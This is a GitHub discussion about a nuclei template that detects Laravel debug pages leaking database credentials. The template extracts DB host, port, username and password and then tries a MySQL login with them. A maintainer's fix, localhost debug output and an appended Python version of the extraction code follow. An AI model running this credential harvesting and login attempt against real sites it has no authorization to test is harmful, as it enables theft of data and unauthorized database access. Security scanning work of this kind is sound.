how to pass param to javascript with extract from http #4642
```yaml
id: laravel-debug-error-dbpass
info:
  name: laravel-debug-error-dbpass
  author: laravel-debug-error-dbpass
  severity: high
flow: |
  if(http(1)==true){
    set("DB_USERNAME",template["DB_USERNAME"])
    set("DB_HOST",template["DB_HOST"])
    set("DB_PORT",template["DB_PORT"])
    set("DB_PASSWORD",template["DB_PASSWORD"])
    javascript(1)
  }
http:
  - raw:
      - |
        PUT /index.php HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - contains_all(body,"DB_USERNAME","DB_PASSWORD")
    extractors:
      - type: xpath
        name: DB_USERNAME
        part: body_1
        internal: true
        xpath:
          - //td[text()="DB_USERNAME"]/following-sibling::td/pre/span/text()
      - type: xpath
        name: DB_PASSWORD
        part: body_1
        internal: true
        xpath:
          - //td[text()="DB_PASSWORD"]/following-sibling::td/pre/span/text()
      - type: xpath
        name: DB_HOST
        part: body_1
        internal: true
        xpath:
          - //td[text()="DB_HOST"]/following-sibling::td/pre/span/text()
      - type: xpath
        name: DB_PORT
        part: body_1
        internal: true
        xpath:
          - //td[text()="DB_PORT"]/following-sibling::td/pre/span/text()
javascript:
  - code: |
      let m = require('nuclei/mysql');
      let c = m.MySQLClient();
      let result = c.Connect( DB_HOST, DB_PORT, DB_USERNAME,DB_PASSWORD);
      //log(template)
      set("DB_USERNAME",template["DB_USERNAME"])
      set("DB_HOST",template["DB_HOST"])
      set("DB_PORT",template["DB_PORT"])
      set("DB_PASSWORD",template["DB_PASSWORD"])
```

The above does not work.
Replies: 2 comments
@tarunKoyalwar could you take a look at this one?
@anquanscan, here's the final template with changes and explanation:

```yaml
id: laravel-debug-error-dbpass
info:
  name: laravel-debug-error-dbpass
  author: laravel-debug-error-dbpass
  severity: high
# extracted values are directly available in subsequent requests no need to use `set(var,varValue)`
flow: http() & javascript()
http:
  - raw:
      - |
        PUT /index.php HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        internal: true # <- this needs to be added to avoid printing this result in cli
        dsl:
          - contains_all(body,"DB_USERNAME","DB_PASSWORD")
    # you need to use `body` and not `body_1` because request condition is only available if one protocol has more than 1 request (docs: https://docs.projectdiscovery.io/templates/protocols/http/basic-http#request-condition)
    extractors:
      - type: xpath
        name: DB_USERNAME
        part: body # <- changed to body from body_1
        internal: true
        xpath:
          - //td[text()="DB_USERNAME"]/following-sibling::td/pre/span/text()
      - type: xpath
        name: DB_PASSWORD
        part: body # <- changed to body from body_1
        internal: true
        xpath:
          - //td[text()="DB_PASSWORD"]/following-sibling::td/pre/span/text()
      - type: xpath
        name: DB_HOST
        part: body # <- changed to body from body_1
        internal: true
        xpath:
          - //td[text()="DB_HOST"]/following-sibling::td/pre/span/text()
      - type: xpath
        name: DB_PORT
        part: body # <- changed to body from body_1
        internal: true
        xpath:
          - //td[text()="DB_PORT"]/following-sibling::td/pre/span/text()
javascript:
  - code: |
      let m = require('nuclei/mysql');
      let c = m.MySQLClient();
      c.Connect(dbhost, dbport, dbuser, dbpass);
    # all variables that need to be passed to javascript has to be done from `args` and you can specify variable here (ref: https://docs.projectdiscovery.io/templates/protocols/javascript/protocol#args-section)
    args:
      dbhost: "{{DB_HOST}}"
      dbport: "{{DB_PORT}}"
      dbuser: "{{DB_USERNAME}}"
      dbpass: "{{DB_PASSWORD}}"
      # body: "{{http_body}}" # <- (example) you can access variables without set just use protocol prefix (here `http_` )
    matchers:
      - type: dsl
        dsl:
          - success && response
```
```
$ ./nuclei -t a.yaml -u http://localhost:8000 -v -svd 1 ↵
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.1.6-dev
projectdiscovery.io
[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.1.6-dev (development)
[INF] Current nuclei-templates version: v9.7.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 46
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[DBG] HTTP Protocol request variables:
1. BaseURL => http://localhost:8000
2. FQDN => localhost
3. File =>
4. Host => localhost
5. Hostname => localhost:8000
6. Input => http://localhost:8000
7. Path =>
8. Port => 8000
9. RootURL => http://localhost:8000
10. Scheme => http
11. ip =>
[VER] [laravel-debug-error-dbpass] Sent HTTP request to http://localhost:8000/
[DBG] Http Protocol response variables:
1. BaseURL => http://localhost:8000
2. FQDN => localhost
3. File =>
4. Host => localhost
5. Hostname => localhost:8000
6. Input => http://localhost:8000
7. Path =>
8. Port => 8000
9. RootURL => http://localhost:8000
10. Scheme => http
11. accept_ranges => bytes
12. all_headers => HTTP/1.1 200 OK Connecti .... Jan 2024 18:29:02 GMT
13. body => <!DOCTYPE html> <html lan .... </table> </body> </html>
14. content_length => 744
15. content_type => text/html; charset=utf-8
16. curl-command => curl -X 'GET' -d '' -H 'H .... 'http://localhost:8000/'
17. date => Mon, 15 Jan 2024 18:45:28 GMT
18. duration => 0.003306833
19. header => HTTP/1.1 200 OK Connecti .... Jan 2024 18:29:02 GMT
20. host => http://localhost:8000
21. http_accept_ranges => bytes
22. http_all_headers => HTTP/1.1 200 OK Connecti .... Jan 2024 18:29:02 GMT
23. http_body => <!DOCTYPE html> <html lan .... </table> </body> </html>
24. http_content_length => 744
25. http_content_type => text/html; charset=utf-8
26. http_date => Mon, 15 Jan 2024 18:45:28 GMT
27. http_duration => 0.003306833
28. http_header => HTTP/1.1 200 OK Connecti .... Jan 2024 18:29:02 GMT
29. http_host => http://localhost:8000
30. http_last_modified => Mon, 15 Jan 2024 18:29:02 GMT
31. http_matched => http://localhost:8000/
32. http_request => GET / HTTP/1.1 Host: loc .... Accept-Encoding: gzip
33. http_response => HTTP/1.1 200 OK Connecti .... </table> </body> </html>
34. http_status_code => 200
35. http_type => http
36. interactsh-server =>
37. ip => 127.0.0.1
38. last_modified => Mon, 15 Jan 2024 18:29:02 GMT
39. matched => http://localhost:8000/
40. request => GET / HTTP/1.1 Host: loc .... Accept-Encoding: gzip
41. response => HTTP/1.1 200 OK Connecti .... </table> </body> </html>
42. status_code => 200
43. template-id => laravel-debug-error-dbpass
44. template-info => {laravel-debug-error-dbpa .... nil> {high} map[] <nil> }
45. template-path => /Users/tarun/Codebase/nuclei/a.yaml
46. type => http
[DBG] Javascript Protocol request variables:
1. DB_HOST => localhost
2. DB_PASSWORD => myPassword
3. DB_PORT => 3306
4. DB_USERNAME => myUsername
5. FQDN => localhost
6. Host => localhost
7. Hostname => localhost:8000
8. Port => 8000
9. http_accept_ranges => bytes
10. http_all_headers => HTTP/1.1 200 OK Connecti .... Jan 2024 18:29:02 GMT
11. http_body => <!DOCTYPE html> <html lan .... </table> </body> </html>
12. http_content_length => 744
13. http_content_type => text/html; charset=utf-8
14. http_date => Mon, 15 Jan 2024 18:45:28 GMT
15. http_duration => 0.003306833
16. http_header => HTTP/1.1 200 OK Connecti .... Jan 2024 18:29:02 GMT
17. http_host => http://localhost:8000
18. http_last_modified => Mon, 15 Jan 2024 18:29:02 GMT
19. http_matched => http://localhost:8000/
20. http_request => GET / HTTP/1.1 Host: loc .... Accept-Encoding: gzip
21. http_response => HTTP/1.1 200 OK Connecti .... </table> </body> </html>
22. http_status_code => 200
23. http_type => http
[VER] [laravel-debug-error-dbpass] Sent Javascript request to localhost:8000
[DBG] Javascript Protocol response variables:
1. DB_HOST => localhost
2. DB_PASSWORD => myPassword
3. DB_PORT => 3306
4. DB_USERNAME => myUsername
5. FQDN => localhost
6. Host => localhost
7. Hostname => localhost:8000
8. Port => 8000
9. error => GoError: dial tcp [::1]:3 .... .methodValueCall (native)
10. host => http://localhost:8000
11. http_accept_ranges => bytes
12. http_all_headers => HTTP/1.1 200 OK Connecti .... Jan 2024 18:29:02 GMT
13. http_body => <!DOCTYPE html> <html lan .... </table> </body> </html>
14. http_content_length => 744
15. http_content_type => text/html; charset=utf-8
16. http_date => Mon, 15 Jan 2024 18:45:28 GMT
17. http_duration => 0.003306833
18. http_header => HTTP/1.1 200 OK Connecti .... Jan 2024 18:29:02 GMT
19. http_host => http://localhost:8000
20. http_last_modified => Mon, 15 Jan 2024 18:29:02 GMT
21. http_matched => http://localhost:8000/
22. http_request => GET / HTTP/1.1 Host: loc .... Accept-Encoding: gzip
23. http_response => HTTP/1.1 200 OK Connecti .... </table> </body> </html>
24. http_status_code => 200
25. http_type => http
26. javascript_DB_HOST => localhost
27. javascript_DB_PASSWORD => myPassword
28. javascript_DB_PORT => 3306
29. javascript_DB_USERNAME => myUsername
30. javascript_FQDN => localhost
31. javascript_Host => localhost
32. javascript_Hostname => localhost:8000
33. javascript_Port => 8000
35. javascript_host => http://localhost:8000
36. javascript_http_accept_ranges => bytes
37. javascript_http_all_headers => HTTP/1.1 200 OK Connecti .... Jan 2024 18:29:02 GMT
38. javascript_http_body => <!DOCTYPE html> <html lan .... </table> </body> </html>
39. javascript_http_content_length => 744
40. javascript_http_content_type => text/html; charset=utf-8
41. javascript_http_date => Mon, 15 Jan 2024 18:45:28 GMT
42. javascript_http_duration => 0.003306833
43. javascript_http_header => HTTP/1.1 200 OK Connecti .... Jan 2024 18:29:02 GMT
44. javascript_http_host => http://localhost:8000
45. javascript_http_last_modified => Mon, 15 Jan 2024 18:29:02 GMT
46. javascript_http_matched => http://localhost:8000/
47. javascript_http_request => GET / HTTP/1.1 Host: loc .... Accept-Encoding: gzip
48. javascript_http_response => HTTP/1.1 200 OK Connecti .... </table> </body> </html>
49. javascript_http_status_code => 200
50. javascript_http_type => http
51. javascript_matched => localhost:8000
52. javascript_request => let m = require('nuclei/m .... dbport, dbuser, dbpass);
53. javascript_success => false
54. javascript_type => javascript
55. matched => localhost:8000
56. request => let m = require('nuclei/m .... dbport, dbuser, dbpass);
57. success => true
58. response => true
59. template-id => laravel-debug-error-dbpass
60. template-info => {laravel-debug-error-dbpa .... nil> {high} map[] <nil> }
61. template-path => /Users/tarun/Codebase/nuclei/a.yaml
62. type => javascript
[laravel-debug-error-dbpass] [javascript] [high] http://localhost:8000/
```

I would recommend the docs for more details and examples of each feature (especially cc: @olearycrew
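To see what the template's `contains_all` matcher and the four XPath extractors actually pull out of a Laravel debug page before those values reach `args`, here is an added Python re-implementation of that extraction step (not code from the thread or from nuclei) run over a constructed sample body; the sample values mirror the `DB_*` variables in the debug log above, and a page without the debug table yields no match and `None` for every key.

```python
from html.parser import HTMLParser

# Constructed sample of a Laravel debug page laid out the way the template's
# XPath expects: <td>LABEL</td><td><pre><span>VALUE</span></pre></td>
SAMPLE_BODY = """<!DOCTYPE html><html><body><table>
<tr><td>APP_ENV</td><td><pre><span>local</span></pre></td></tr>
<tr><td>DB_HOST</td><td><pre><span>localhost</span></pre></td></tr>
<tr><td>DB_PORT</td><td><pre><span>3306</span></pre></td></tr>
<tr><td>DB_USERNAME</td><td><pre><span>myUsername</span></pre></td></tr>
<tr><td>DB_PASSWORD</td><td><pre><span>myPassword</span></pre></td></tr>
</table></body></html>"""

DB_KEYS = ("DB_HOST", "DB_PORT", "DB_USERNAME", "DB_PASSWORD")


class EnvTableParser(HTMLParser):
    """Collect label -> value pairs, following the same path as the XPath
    //td[text()=LABEL]/following-sibling::td/pre/span/text()."""

    def __init__(self):
        super().__init__()
        self.pairs = {}
        self._path = []        # stack of currently open tags
        self._label = None     # text of the first <td> in the current row
        self._cell_idx = 0     # which <td> of the row we are in
        self._text = ""

    def handle_starttag(self, tag, attrs):
        self._path.append(tag)
        if tag == "tr":
            self._cell_idx, self._label = 0, None
        if tag == "td":
            self._cell_idx += 1
            self._text = ""

    def handle_data(self, data):
        if self._cell_idx == 1 and self._path[-1:] == ["td"]:
            self._text += data                       # label cell
        elif self._cell_idx == 2 and self._path[-3:] == ["td", "pre", "span"]:
            self._text += data                       # value cell, td/pre/span only

    def handle_endtag(self, tag):
        if tag == "td":
            if self._cell_idx == 1:
                self._label = self._text.strip()
            elif self._cell_idx == 2 and self._label:
                self.pairs[self._label] = self._text.strip()
        while self._path and self._path.pop() != tag:
            pass


def matches(body):
    """Same condition as the template's DSL matcher contains_all(body, ...)."""
    return all(k in body for k in ("DB_USERNAME", "DB_PASSWORD"))


def extract_db_settings(body):
    """Equivalent of the four xpath extractors; a missing row yields None."""
    parser = EnvTableParser()
    parser.feed(body)
    return {k: parser.pairs.get(k) for k in DB_KEYS}
```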